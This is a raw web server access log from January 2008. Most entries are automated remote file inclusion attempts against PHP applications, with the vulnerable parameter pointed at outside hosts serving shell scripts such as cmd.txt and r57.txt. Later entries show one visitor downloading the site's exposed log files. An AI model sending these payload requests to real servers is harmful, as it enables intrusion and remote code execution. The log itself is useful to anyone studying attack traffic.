81.31.42.12 - - [22/Jan/2008:10:05:03 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.spr0x.kit.net/idon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.149.191 - - [22/Jan/2008:10:05:03 -0800] "GET //admin.php?include_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.191 - - [22/Jan/2008:10:05:09 -0800] "GET /logs//admin.php?include_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:10:05:30 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:10:05:30 -0800] "GET //skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:10:05:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.160.127 - - [22/Jan/2008:10:06:27 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.laila.jp/item_pics/d3rf/list.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.162.165.36 - - [22/Jan/2008:10:06:39 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.massmodes.xpg.com.br/www.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:10:07:28 -0800] "GET /logs/access_071214.log//admin.php?include_path=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.6.102.165 - - [22/Jan/2008:10:07:29 -0800] "GET /logs//admin.php?include_path=http://209.250.234.234/~smdemo/images/store.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
150.178.1.3 - - [22/Jan/2008:10:10:42 -0800] "GET /logs/amazonpartner.php?mosConfig_absolute_path=www.gianvito.it/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
150.178.1.3 - - [22/Jan/2008:10:10:57 -0800] "GET /logs/access.log/amazonpartner.php?mosConfig_absolute_path=www.gianvito.it/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.194.210.35 - - [22/Jan/2008:10:11:09 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.194.210.35 - - [22/Jan/2008:10:11:10 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.194.210.35 - - [22/Jan/2008:10:11:10 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.surginet.info//modules/tinycontent/admin/spaw/.debug/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:10:13:18 -0800] "GET /logs/access.log//spaw/config/spaw_control.config.php?spaw_root=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:10:13:18 -0800] "GET //spaw/config/spaw_control.config.php?spaw_root=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.187.80.1 - - [22/Jan/2008:10:13:18 -0800] "GET /logs//spaw/config/spaw_control.config.php?spaw_root=http://64.22.125.219/r0x/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:10:13:32 -0800] "GET /logs//smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:10:13:33 -0800] "GET //smallaxe-0.3.1/inc/linkbar.php?cfile=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
85.114.132.12 - - [22/Jan/2008:10:16:19 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [22/Jan/2008:10:16:19 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [22/Jan/2008:10:16:20 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.27.111 - - [22/Jan/2008:10:25:23 -0800] "GET /tmp/sess_8b04269aa0d2bbf8ef9557419d3d8a38 HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.75.212.136 - - [22/Jan/2008:10:25:41 -0800] "GET //appserv/main.php?appserv_root=http://aggg.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.123.68.13 - - [22/Jan/2008:10:25:43 -0800] "GET /logs/access_071219.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.btd-gmbh.de/rss? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.68.13 - - [22/Jan/2008:10:25:43 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.btd-gmbh.de/rss? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.68.13 - - [22/Jan/2008:10:25:44 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.btd-gmbh.de/rss? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:10:26:00 -0800] "GET /logs/amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.27.39 - - [22/Jan/2008:10:26:00 -0800] "GET /amember/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.hapich.com/pix/admin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:10:27:06 -0800] "GET /logs/access_080101.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:10:27:07 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:10:27:07 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:10:27:44 -0800] "GET /logs/access_071214.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.123.68.13 - - [22/Jan/2008:10:28:03 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.btd-gmbh.de/rss? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:10:30:11 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:10:30:18 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.52.223.25 - - [22/Jan/2008:10:30:24 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.buergerfunk-bochum.de/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.76.186.87 - - [22/Jan/2008:10:30:24 -0800] "GET /logs/access_071229.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:10:30:31 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:10:30:31 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:10:30:31 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.35.191.105 - - [22/Jan/2008:10:30:38 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://bbb.hostingisfree.com/bbb/chat/appdata/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:10:30:53 -0800] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:10:30:54 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.45.253 - - [22/Jan/2008:10:30:54 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://direma.at/administrator/modules/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:10:31:44 -0800] "GET /logs/database.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.212.130.120 - - [22/Jan/2008:10:31:44 -0800] "GET /database.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:10:31:45 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:10:31:46 -0800] "GET //skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:10:31:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.177.212.128 - - [22/Jan/2008:10:34:13 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.218 - - [22/Jan/2008:10:34:56 -0800] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:27 -0800] "GET / HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:28 -0800] "GET /minamijewelry/ HTTP/1.1" 200 2110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:29 -0800] "GET /minamijewelry/html/ HTTP/1.1" 200 13288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:30 -0800] "GET /minamijewelry/html/dream.html HTTP/1.1" 200 18218 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:31 -0800] "GET /minamijewelry/html/moon.html HTTP/1.1" 200 20921 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:33 -0800] "GET /drop/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:35 -0800] "GET /backup/ HTTP/1.1" 401 395 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:35 -0800] "GET /?N=D HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:36 -0800] "GET /?N=A HTTP/1.1" 200 2962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:37 -0800] "GET /minamijewelry/html/about.html HTTP/1.1" 200 12859 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:38 -0800] "GET /minamijewelry/bird.psd HTTP/1.1" 200 109644 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:40 -0800] "GET /minamijewelry/?N=D HTTP/1.1" 200 2110 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:41 -0800] "GET /minamijewelry/?N=A HTTP/1.1" 200 2110 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:42 -0800] "GET /_private/ HTTP/1.1" 403 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:42 -0800] "GET /minamijewelry/html/wind.html HTTP/1.1" 200 20883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
85.25.150.241 - - [22/Jan/2008:10:39:43 -0800] "GET //modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
85.25.150.241 - - [22/Jan/2008:10:39:43 -0800] "GET /logs//modules/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ssb-hamm.de//img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:46 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.1" 200 515148 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:46 -0800] "GET /minamijewelry/html/index.html HTTP/1.1" 200 13288 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:48 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:49 -0800] "GET /funny/ HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
66.162.134.137 - - [22/Jan/2008:10:39:49 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mateus.t5.com.br/tool25.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [22/Jan/2008:10:39:49 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mateus.t5.com.br/tool25.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.137 - - [22/Jan/2008:10:39:49 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.mateus.t5.com.br/tool25.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:50 -0800] "GET /funny/?N=D HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:50 -0800] "GET /funny/?N=A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:51 -0800] "GET /funny/?A HTTP/1.1" 200 808 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:52 -0800] "GET /retreat1/?N=D HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:53 -0800] "GET /retreat1/?N=A HTTP/1.1" 200 15081 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:55 -0800] "GET /minamijewelry/html/bird.html HTTP/1.1" 200 20962 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:56 -0800] "GET /minamijewelry/source_images/ HTTP/1.1" 200 2414 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:56 -0800] "GET /minamijewelry/source_images/updated1/ HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:57 -0800] "GET /minamijewelry/source_images/updated1/?A HTTP/1.1" 200 1443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:39:58 -0800] "GET /logs/ HTTP/1.1" 200 31899 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:00 -0800] "GET /logs/access_070721.log HTTP/1.1" 200 23814 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:01 -0800] "GET /logs/access_071216.log HTTP/1.1" 200 200644 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:04 -0800] "GET /logs/access_070814.log HTTP/1.1" 200 55888 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:06 -0800] "GET /logs/access_070713.log HTTP/1.1" 200 67092 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:08 -0800] "GET /logs/access_071208.log HTTP/1.1" 200 94709 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:11 -0800] "GET /logs/access_070806.log HTTP/1.1" 200 23344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:12 -0800] "GET /logs/access_071231.log HTTP/1.1" 200 225555 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:15 -0800] "GET /logs/access_071029.log HTTP/1.1" 200 21268 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:16 -0800] "GET /logs/access_070705.log HTTP/1.1" 200 50888 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:18 -0800] "GET /logs/access_080101.log HTTP/1.1" 200 216727 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:21 -0800] "GET /logs/access_071223.log HTTP/1.1" 200 97760 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:23 -0800] "GET /logs/access_070821.log HTTP/1.1" 200 64221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.29.37 - - [22/Jan/2008:10:40:24 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:25 -0800] "GET /logs/access_070720.log HTTP/1.1" 200 29646 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
38.102.88.110 - - [22/Jan/2008:10:40:26 -0800] "GET /database.php?mosConfig_absolute_path=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:27 -0800] "GET /logs/access_071215.log HTTP/1.1" 200 124992 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:29 -0800] "GET /logs/access_070813.log HTTP/1.1" 200 98487 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:31 -0800] "GET /logs/access_070712.log HTTP/1.1" 200 114624 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:34 -0800] "GET /logs/access_071207.log HTTP/1.1" 200 248258 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:37 -0800] "GET /logs/access_071129.log HTTP/1.1" 200 76564 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:39 -0800] "GET /logs/access_070805.log HTTP/1.1" 200 30484 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:40 -0800] "GET /logs/access_071230.log HTTP/1.1" 200 231687 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:43 -0800] "GET /logs/access_071028.log HTTP/1.1" 200 27183 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:45 -0800] "GET /logs/access_070929.log HTTP/1.1" 200 98605 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:47 -0800] "GET /logs/access_070704.log HTTP/1.1" 200 11515 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:48 -0800] "GET /logs/access_071222.log HTTP/1.1" 200 103077 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:50 -0800] "GET /logs/access_070820.log HTTP/1.1" 200 55005 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:52 -0800] "GET /logs/access_071214.log HTTP/1.1" 200 157483 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:55 -0800] "GET /logs/access_070812.log HTTP/1.1" 200 37724 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:56 -0800] "GET /logs/access_070711.log HTTP/1.1" 200 43580 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:40:58 -0800] "GET /logs/access_071206.log HTTP/1.1" 200 76911 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:41:02 -0800] "GET /logs/access_071128.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:41:04 -0800] "GET /logs/access_070804.log HTTP/1.1" 200 28778 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:41:05 -0800] "GET /logs/access_071027.log HTTP/1.1" 200 191919 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:41:08 -0800] "GET /logs/access_070928.log HTTP/1.1" 200 16581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:41:09 -0800] "GET /logs/access_070703.log HTTP/1.1" 200 22875 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.dmulk.com"
89.181.61.205 - - [22/Jan/2008:10:41:11 -0800] "GET /logs/access_071221.log HTTP/1.1" 200 167044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
